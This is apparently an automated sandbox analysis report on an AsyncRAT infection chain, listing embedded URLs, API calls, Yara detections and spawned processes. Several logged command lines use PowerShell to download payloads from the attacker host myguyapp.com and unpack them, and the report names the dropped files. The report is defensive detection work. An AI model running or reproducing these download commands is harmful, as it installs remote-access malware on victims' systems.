Source: msword.exe, 00000016.00000003.2180955166.00000000029A4000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000020.00000003.3546333240.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000003.2212981641.000000000406B000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000002.4145541931.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, DanielPulse.scr.32.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: msword.exe, 00000016.00000003.2180955166.00000000029A4000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmp, Carter.pif, 00000020.00000003.3546333240.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000003.2212981641.000000000406B000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000002.4145541931.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, DanielPulse.scr.32.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: msword.exe, 00000016.00000003.2180955166.00000000029A4000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000020.00000003.3546333240.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000003.2212981641.000000000406B000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000002.4145541931.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, DanielPulse.scr.32.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: svchost.exe, 0000000A.00000002.3422275675.0000022C7CE00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: msword.exe.21.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: msword.exe.21.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: msword.exe.21.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: msword.exe.21.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: msword.exe.21.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: svchost.exe, 0000000A.00000003.1772962083.0000022C7D018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 0000000A.00000003.1772962083.0000022C7D018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 0000000A.00000003.1772962083.0000022C7D018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 0000000A.00000003.1772962083.0000022C7D018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 0000000A.00000003.1772962083.0000022C7D018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000000A.00000003.1772962083.0000022C7D018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 0000000A.00000003.1772962083.0000022C7D04D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 0000000A.00000003.1772962083.0000022C7D107000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: wscript.exe, wscript.exe, 00000001.00000003.2177622605.0000000005789000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2177573847.0000000005791000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2177638147.0000000005789000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2177638147.0000000005785000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1901529582.0000000005791000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2177987329.000000000578F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://myguyapp.co
Source: wscript.exe, 00000001.00000003.2177885408.000000000340D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://myguyapp.com/msword.zip
Source: msword.exe, 00000016.00000000.2177420421.0000000000408000.00000002.00000001.01000000.0000000D.sdmp, msword.exe, 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmp, msword.exe.21.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: msword.exe.21.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: msword.exe.21.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: msword.exe.21.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: msword.exe.21.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: msword.exe, 00000016.00000003.2180955166.00000000029A4000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000020.00000003.3546333240.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000003.2212981641.000000000406B000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000002.4145541931.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, DanielPulse.scr.32.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: msword.exe, 00000016.00000003.2180955166.00000000029A4000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000020.00000003.3546333240.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000003.2212981641.000000000406B000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000002.4145541931.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, DanielPulse.scr.32.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: msword.exe, 00000016.00000003.2180955166.00000000029A4000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmp, Carter.pif, 00000020.00000003.3546333240.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000003.2212981641.000000000406B000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000002.4145541931.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, DanielPulse.scr.32.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: RegAsm.exe, 0000002C.00000002.4145311596.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msword.exe, 00000016.00000003.2180955166.00000000029A4000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000020.00000003.3546333240.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000003.2212981641.000000000406B000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000002.4145541931.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, DanielPulse.scr.32.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: msword.exe, 00000016.00000003.2180955166.00000000029A4000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000020.00000003.3546333240.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000003.2212981641.000000000406B000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000002.4145541931.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, DanielPulse.scr.32.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: msword.exe, 00000016.00000003.2180955166.00000000029A4000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmp, Carter.pif, 00000020.00000003.2212981641.000000000406B000.00000004.00000800.00020000.00000000.sdmp, DanielPulse.scr, 00000028.00000002.2254485808.0000000001019000.00000002.00000001.01000000.00000011.sdmp, DanielPulse.scr, 0000002A.00000002.2356871731.0000000000F89000.00000002.00000001.01000000.00000011.sdmp, DanielPulse.scr.32.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: msword.exe.21.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: svchost.exe, 0000000A.00000003.1772962083.0000022C7D0C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 0000000A.00000003.1772962083.0000022C7D11A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 0000000A.00000003.1772962083.0000022C7D0C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 0000000A.00000003.1772962083.0000022C7D0A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1772962083.0000022C7D0C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1772962083.0000022C7D107000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1772962083.0000022C7D0F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 0000000A.00000003.1772962083.0000022C7D0C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: mshta.exe, 00000000.00000002.4143659814.00000000029E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: wscript.exe, wscript.exe, 00000001.00000003.2177573847.0000000005791000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2177638147.0000000005785000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1901529582.0000000005791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.c
Source: mshta.exe, 00000000.00000002.4143659814.00000000029C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/
Source: mshta.exe, 00000000.00000002.4143659814.00000000029C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/a&dZ
Source: mshta.exe, 00000000.00000002.4143659814.000000000293E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.4143659814.00000000029B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.4143659814.0000000002998000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.4145297891.0000000004958000.00000004.00000800.00020000.00000000.sdmp, c2.hta	String found in binary or memory: https://myguyapp.com/bo.js
Source: mshta.exe, 00000000.00000002.4148427564.0000000006163000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/bo.js9
Source: mshta.exe, 00000000.00000002.4143659814.000000000293E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/bo.jsQ
Source: mshta.exe, 00000000.00000002.4147429426.0000000005E3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/bo.jsScripting.FileSystemObject
Source: mshta.exe, 00000000.00000002.4143659814.000000000293E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/bo.jsY
Source: wscript.exe, 00000001.00000002.2178189802.00000000033D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.2178382506.0000000003716000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/f.pdf
Source: wscript.exe, 00000001.00000002.2178189802.0000000003398000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/f.pdf?q
Source: svchost.exe, 0000000A.00000003.1772962083.0000022C7D0C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 0000000A.00000003.1772962083.0000022C7D072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: msword.exe, 00000016.00000003.2180955166.00000000029A4000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000020.00000003.3546333240.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000003.2212981641.000000000406B000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000002.4145541931.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, DanielPulse.scr.32.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: msword.exe, 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://www.globalsign.com/rea
Source: msword.exe, 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://www.globalsign.com/reancel
Source: DanielPulse.scr.32.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: msword.exe, 00000016.00000003.2180955166.00000000029A4000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000020.00000003.3546333240.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000003.2212981641.000000000406B000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000020.00000002.4145541931.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, DanielPulse.scr.32.dr	String found in binary or memory: https://www.globalsign.com/repository/06

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735

Source: unknown	HTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.4:49735 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 22_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

22_2_004050CD

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C64830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	32_2_00C64830
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FC4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	40_2_00FC4830
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F34830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	42_2_00F34830

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 32_2_00C64632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

32_2_00C64632

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 22_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

22_2_004044A5

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C7D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	32_2_00C7D164
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FDD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	40_2_00FDD164
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F4D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	42_2_00F4D164

System Summary

Malicious sample detected (through community Yara rule)

Source: 32.3.Carter.pif.3db2268.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 32.3.Carter.pif.3e14c38.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 44.2.RegAsm.exe.9e0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 32.3.Carter.pif.3db2268.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 32.3.Carter.pif.3e14c38.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000020.00000003.3491947145.000000000184B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000020.00000003.3546191644.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000020.00000003.3546191644.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000020.00000003.3546191644.0000000003DFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000002C.00000002.4143164182.00000000009E2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000020.00000003.3546333240.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000020.00000003.3546306644.0000000003E43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000020.00000003.3546191644.0000000003E0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Drops large PE files

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File dump: msword.exe.21.dr 891289591

Jump to dropped file

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Wscript called in batch mode (surpress errors)

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Invoke-WebRequest -Uri 'http://myguyapp.com/msword.zip' -OutFile 'C:\Users\user\AppData\Local\Temp\msword.zip'"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'http://myguyapp.com/msword.zip' -OutFile 'C:\Users\user\AppData\Local\Temp\msword.zip'"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c mkdir "C:\Users\user\AppData\Local\Temp\msword"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Expand-Archive -Path 'C:\Users\user\AppData\Local\Temp\msword.zip' -DestinationPath 'C:\Users\user\AppData\Local\Temp\msword' -Force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Expand-Archive -Path 'C:\Users\user\AppData\Local\Temp\msword.zip' -DestinationPath 'C:\Users\user\AppData\Local\Temp\msword' -Force"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Invoke-WebRequest -Uri 'http://myguyapp.com/msword.zip' -OutFile 'C:\Users\user\AppData\Local\Temp\msword.zip'"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c mkdir "C:\Users\user\AppData\Local\Temp\msword"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Expand-Archive -Path 'C:\Users\user\AppData\Local\Temp\msword.zip' -DestinationPath 'C:\Users\user\AppData\Local\Temp\msword' -Force"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'http://myguyapp.com/msword.zip' -OutFile 'C:\Users\user\AppData\Local\Temp\msword.zip'"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Expand-Archive -Path 'C:\Users\user\AppData\Local\Temp\msword.zip' -DestinationPath 'C:\Users\user\AppData\Local\Temp\msword' -Force"

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 32_2_00C542D5: CreateFileW,DeviceIoControl,CloseHandle,

32_2_00C542D5

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 32_2_00C48F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

32_2_00C48F2E

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 22_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,	22_2_00403883
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C55778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	32_2_00C55778
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FB5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	40_2_00FB5778
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F25778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	42_2_00F25778

Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\DistributionsPit
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\PrintersOngoing

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 22_2_0040497C	22_2_0040497C
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 22_2_00406ED2	22_2_00406ED2
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 22_2_004074BB	22_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00BFB020	32_2_00BFB020
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00BF94E0	32_2_00BF94E0
